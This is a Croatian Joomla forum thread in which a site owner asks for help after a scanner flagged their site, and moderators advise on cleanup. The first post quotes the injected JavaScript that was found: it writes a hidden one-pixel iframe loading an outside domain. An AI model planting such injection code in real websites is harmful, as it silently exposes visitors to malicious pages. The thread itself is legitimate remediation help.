joomla_antivirus_logo

Autor Tema: Sucuri SiteCheck  (Posjeta: 2580 )

0 Članova i 1 Gost pregledava ovu temu.

zvrko

  • Novi forumaš
  • *
  • Postova: 6
  • Karma: 0
    • Profil
Sucuri SiteCheck
« : 14. Studeni 2012, 20:26 »
Veiliki pozdrav svima na doticnoj stranici http://sitecheck.sucuri.net/ sam prije 10-tak dan aizvrsio test stranice bilo je sve ok dok danas mi kaze da je stranica inficirana Site infected with malware.
Evo sta pise:
Anomaly behavior detected (possible malware).
Details: http://sucuri.net/malware/malware-entry-mwanomalysp8
<script type="text/javascript" language="javascript" > (function(){var a = document.createElement('iframe');a.src = 'http://beforew.com';a.style.position = 'absolute';a.style.border = '0';a.style.height = '1px';a.style.width = '1px';a.style.left = '1px';a.style.top = '1px';if(!document.getElementById('d6f39715')){document.write('<div id=\'d6f39715\'></div>');document.getElementById('d6f39715').appendChild(a);}})();</script>

Ima li sanse da se toga rijesim? I jel to predstavlja problem sigurnosti?

Hvala

Dario

  • Global Moderator
  • *****
  • Postova: 1.023
  • Karma: 26
  • Web/Joomla Developer
    • Profil
    • dBlaze
Odg: Sucuri SiteCheck
« Odgovori #1 : 15. Studeni 2012, 11:32 »
Ustvari piše da je possible malware :)
Bilo kako bilo, ovo nije normalno ponašanje za jednu stranicu... Obično takva "gamad" obitava u glavnom index.php-u tvog template-a pa prvo pogledaj tamo i traži taj dio koda... Kad ga nađer - obrišeš ga, updateaš joomlu i sve komponente pa ćeš vidjeti kako se stvar razvija.... Ovakve stvari obično dolaze kroz loše napisane ekstenzije, a postoji inače i popis takvih dodataka pa malo škicni... Ako ne uspiješ riješiti, javi se pa ću ti ja to odraditi.....
---
Molim da mi ne šaljete privatne poruke sa zahtjevima za pomoć, takve poruke ignoriram - zato služi forum :)
2b || !2b; this.question();
http://www.dblaze.eu

zvrko

  • Novi forumaš
  • *
  • Postova: 6
  • Karma: 0
    • Profil
Odg: Sucuri SiteCheck
« Odgovori #2 : 15. Studeni 2012, 13:57 »
Hvala ti Dario,jos je i problem sta sad i google izbacuje da je stranica zarazena,vidit cu ako necu moc sam rijesiti javim se,hvala!!

Dario

  • Global Moderator
  • *****
  • Postova: 1.023
  • Karma: 26
  • Web/Joomla Developer
    • Profil
    • dBlaze
Odg: Sucuri SiteCheck
« Odgovori #3 : 16. Studeni 2012, 08:45 »
Update-aj obavezno sve kopmonente/module/plugin-ove koje možeš, naravno uvijek prije ovakvih stvari napraviš backup. Također počisti sav cache u joomli i pogledaj malo po ovoj stranici pa prati i odradi ovo kaj google piše
---
Molim da mi ne šaljete privatne poruke sa zahtjevima za pomoć, takve poruke ignoriram - zato služi forum :)
2b || !2b; this.question();
http://www.dblaze.eu

Bernard [Orion Web]

  • Administrator
  • *****
  • Postova: 521
  • Karma: 3
  • :/# Orion | Federation Servers
    • Profil
    • Orion Web
Odg: Sucuri SiteCheck
« Odgovori #4 : 16. Studeni 2012, 10:06 »
Kao što je i Dario rekao, u slučaju da se pronađe ovakav XSS i slični JS ubačeni kod, to je znak da ili koristiš staru verziju Joomle koja ima poznati sigurnosni propust, ili neka od ekstenzija ima propust.

Preporučio bih da pažljivo prođeš ovo: http://forum.joomla.org/viewtopic.php?f=432&t=335090

Ako si dovoljno iskusan (!!) za skeniranje svih datoteka u Joomla instalaciji možeš koristiti moju mini-skriptu: https://github.com/btoplak/Joomla-Anti-Malware-Scan-Script - prije korištenja obavezno pročitaj kompletnu uputu!

erbi

  • Ozbiljan forumaš
  • ****
  • Postova: 368
  • Karma: 0
    • Profil
    • Radio Tomi
Odg: Sucuri SiteCheck
« Odgovori #5 : 16. Studeni 2012, 10:14 »
Citat:
Također počisti sav cache u joomli i pogledaj malo po ovoj stranici pa prati i odradi ovo kaj google piše
Klik na ovu stranicu:
Citat:
Warning - visiting this web site may harm your computer!

zvrko

  • Novi forumaš
  • *
  • Postova: 6
  • Karma: 0
    • Profil
Odg: Sucuri SiteCheck
« Odgovori #6 : 18. Studeni 2012, 13:47 »
Hvala svima rijeseno sa backupom sad sve stima,i google je poslan zahtjev da makne blokadu sad koliko ce to trajat neznam u stvari sad na sucuri sve stima nema malwera osim sta je site pod blokom!!
« Zadnja izmjena: 18. Studeni 2012, 13:49 zvrko »

 

joomla_antivirus_logo
anything